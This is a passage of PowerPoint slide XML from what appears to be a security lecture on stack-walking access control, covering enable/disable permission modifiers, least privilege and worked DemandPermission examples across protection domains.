                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C2 and C3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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04B9E0D0-A8A3-BD82-0ECE-B3EFD002E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Stack walking</a:t>
            </a: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0832A165-AF59-E25E-F56F-639F58ABFD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0000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="338138" indent="-338138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Basic algorithm is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" i="1"/>
              <a:t>too restrictive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t> in some cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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E.g. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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mic Sans MS" panose="030F0702030302020204" pitchFamily="6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Allowing an untrusted component to delete some specific files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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mic Sans MS" panose="030F0702030302020204" pitchFamily="6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Giving a partially trusted component the right to open specially marked windows (eg. security pop-ups) without giving it the right to open arbitrary windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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mic Sans MS" panose="030F0702030302020204" pitchFamily="6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Giving an app the right to phone certain phone numbers (eg. only domestic ones, or only ones in the mobile’s phonebook) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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mic Sans MS" panose="030F0702030302020204" pitchFamily="6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altLang="nl-NL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B6E12646-2E1B-99AA-6980-C58AFBF888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72895B44-D8D2-4EAD-B573-0B2F56CCB7F4}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F37F16B-78AA-26B8-D62F-1337A7B75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Stack walk modifiers</a:t>
            </a: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EA21C63-F775-70C5-72A2-D92AC6E9CD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0000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="338138" indent="-338138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>
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enable_permission(P): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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mic Sans MS" panose="030F0702030302020204" pitchFamily="6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means: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don’t check my callers for this permission, I take full responsibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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mic Sans MS" panose="030F0702030302020204" pitchFamily="6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This is essential to allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" i="1"/>
              <a:t>controlled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>  access to resources for less trusted code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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altLang="nl-NL"/>
          </a:p>
          <a:p>
            <a:pPr marL="338138" indent="-338138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9900"/>
              </a:buClr>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disable_permission(P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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mic Sans MS" panose="030F0702030302020204" pitchFamily="6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means: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don’t grant me this permission, I don’t need it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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mic Sans MS" panose="030F0702030302020204" pitchFamily="6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This allows applying the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> principle of least privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL"/>
              <a:t>(ie. only givie or ask the privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" i="1"/>
              <a:t>really</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL"/>
              <a:t> needed, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" i="1"/>
              <a:t>only when  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL"/>
              <a:t>they are really needed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-280988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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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altLang="nl-NL" i="1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84237D85-5F9F-F25B-1C86-8BC0FCEE5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FDB1500E-575B-4BEA-A278-8E8B1D3EE2D5}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F0F8187-3337-B7D4-E555-3A417BED4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Stack walking: algorithm</a:t>
            </a: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16D630CC-6CDC-0379-DEEE-78355CF229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0000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/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On creating new thread: </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL">
              <a:solidFill>
                <a:schemeClr val="accent2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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	new thread inherit access control context of creating thread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altLang="nl-NL"/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DemandPermission(P) algorithm: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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for each caller on the stack, from top to bottom:              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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       if the caller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AutoNum type="alphaL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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lacks Permission P:                 throw exception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AutoNum type="alphaL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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>has disabled Permission P:  throw exception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AutoNum type="alphaL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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>has enabled Permission P:   return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omic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startA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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>check inherited access control context</a:t>
            </a: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A1E72899-630F-72F1-5540-2041268F87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F7E5897A-3C3D-4543-B739-09FEB8128B86}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D7BD022-019A-17AE-89F5-80C3549B8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Stack walk modifiers: examples</a:t>
            </a:r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56FF0E0B-D777-3EDC-308D-53A90CEC63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944101A0-61CD-4426-8B89-69F3C1470C61}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1400"/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E84A8E55-D511-9BE4-5D3E-C139ABB6C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3" y="2665413"/>
            <a:ext cx="1176337" cy="839787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="316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2700"/>
              <a:t>PD1</a:t>
            </a:r>
          </a:p>
        </p:txBody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8A4E03A9-40A0-1FCD-F39C-A2D74517D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655888"/>
            <a:ext cx="1176338" cy="839787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="316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2700"/>
              <a:t>PD3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68614" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AC3949-C8D4-B878-993B-FB24DAD65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2659063"/>
            <a:ext cx="1176337" cy="839787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="316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2700"/>
              <a:t>PD2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68615" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14C82CFA-3EDD-C403-681B-B4B910184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8925" y="3074988"/>
            <a:ext cx="33655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616" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34F9A7B7-A2B0-B618-ACD4-0904A18BD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475" y="2828925"/>
            <a:ext cx="30622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/>
              <a:t>demandPermission(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" altLang="nl-NL">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‏</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68617" name="Oval 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56112387-91D0-5588-BA56-F79F6D6F1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13" y="3822700"/>
            <a:ext cx="1343025" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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2400"/>
              <a:t>P4,P2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68618" name="Oval 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A349128B-247C-261E-41BA-4D7D9B089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3783013"/>
            <a:ext cx="1344612" cy="1008062"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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2400">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400"/>
              <a:t>,P2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68619" name="Oval 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBF06344-0C44-5F07-86BD-DFA1FC514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3844925"/>
            <a:ext cx="1582738" cy="946150"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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2400">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400"/>
              <a:t>,P2,P3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68620" name="AutoShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24C03BFA-E94B-324E-4537-4204D44F09A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="68617" idx="0"/>
            <a:endCxn id="68612" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1978025" y="3505200"/>
            <a:ext cx="0" cy="3175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1" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07D1A1B1-9B90-DB74-3A15-80D604EE88F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="68618" idx="0"/>
            <a:endCxn id="68614" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3827463" y="3498850"/>
            <a:ext cx="44450" cy="284163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2" name="AutoShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF694E0-174D-3AAD-ABAA-6CD69C458CA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="68619" idx="0"/>
            <a:endCxn id="68613" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5975350" y="3495675"/>
            <a:ext cx="71438" cy="34925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63" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEBE1E87-FBB7-9A51-41CB-02A64D7BC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5764213"/>
            <a:ext cx="718026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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DemandPermission(P1) fails because PD1 does not have</a:t>
            </a:r>
          </a:p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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Permission P1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68624" name="Text Box 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{782B76B3-E50C-E338-E9E4-BA41549BB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5268913"/>
            <a:ext cx="49593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/>
              <a:t>Will DemandPermission(P1) succeed ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68625" name="Text Box 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC5ACF56-B19F-ED62-CAA4-1E526FA0C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3189288"/>
            <a:ext cx="8477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800"/>
              <a:t>calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68626" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39AA810F-5E8D-0E38-AE64-3B10FEF9F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3170238"/>
            <a:ext cx="8477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800"/>
              <a:t>calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68627" name="Straight Arrow Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F454A11-5AD0-81E6-8777-81DD99C6839D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2520950" y="3074988"/>
            <a:ext cx="763588" cy="63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8" name="Straight Arrow Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B525F10D-85E5-B4E6-0BFD-92A7FEFCCB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51350" y="3067050"/>
            <a:ext cx="100647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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEE22EF5-9053-E392-CB05-413565AF9F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Stack walk modifiers: examples</a:t>
            </a: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DCF345A3-02FC-D069-FD4F-7F66C75D2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84BF9339-4048-439F-8F6B-A68BB1DAAE80}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1400"/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0BAFD86D-6EA7-9DD5-AE16-85C190547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3" y="2660650"/>
            <a:ext cx="1176337" cy="839788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="316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2700"/>
              <a:t>PD1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70661" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D19068C1-C679-3160-64CB-4B820CA0E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825" y="2660650"/>
            <a:ext cx="1176338" cy="839788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="316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2700"/>
              <a:t>PD3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70662" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DA7FE8E-8D72-F070-E610-6388379EB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2660650"/>
            <a:ext cx="1176338" cy="839788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="316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2700"/>
              <a:t>PD2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70663" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89417C22-3339-E428-D5F7-40336F3E6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163" y="3079750"/>
            <a:ext cx="3365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64" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB64A7D-39E2-F085-0AE4-931B6801D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800" y="2887663"/>
            <a:ext cx="30622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/>
              <a:t>demandPermission(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" altLang="nl-NL">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‏</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70665" name="Oval 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C56765-47A8-5DDF-722D-6E0A7CC4E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3822700"/>
            <a:ext cx="1344613" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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2400"/>
              <a:t>P4,P2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70666" name="Oval 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{076D4027-504A-6B86-4519-F8840DAFB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288" y="3835400"/>
            <a:ext cx="1344612" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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2400">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400"/>
              <a:t>,P2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70667" name="Oval 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{168DC956-2755-560A-14AC-7332E8458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938" y="3835400"/>
            <a:ext cx="1501775" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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2400">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400"/>
              <a:t>,P2,P3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70668" name="AutoShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F5F3C9-EF5F-506B-8511-B50704E1B1FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="70665" idx="0"/>
            <a:endCxn id="70660" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1931988" y="3498850"/>
            <a:ext cx="1587" cy="322263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9" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34FBAA57-FAEB-309D-A559-596187298CF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="70666" idx="0"/>
            <a:endCxn id="70662" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4114800" y="3498850"/>
            <a:ext cx="1588" cy="33655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0" name="AutoShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882A23DB-0831-70D3-AB58-B37202D87D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="70667" idx="0"/>
            <a:endCxn id="70661" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6092032" y="3628231"/>
            <a:ext cx="334962" cy="793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7" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FFEDA11-4389-374D-152B-4CBD53ECE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5764213"/>
            <a:ext cx="43751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>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DemandPermission(P1) succeeds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70672" name="Text Box 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C003F5-0E27-7642-FC47-59A543FE1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8" y="2203450"/>
            <a:ext cx="29178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>
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EnablePermission(P1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" altLang="nl-NL" b="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‏</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70673" name="Text Box 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1F8BD94-DE0A-42A9-2119-C93E85FD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5268913"/>
            <a:ext cx="49593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/>
              <a:t>Will DemandPermission(P1) succeed ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70674" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11D6D6B1-A183-5AA6-A82E-01C857297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3170238"/>
            <a:ext cx="8477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800"/>
              <a:t>calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70675" name="Text Box 19">
            <a:extLst>
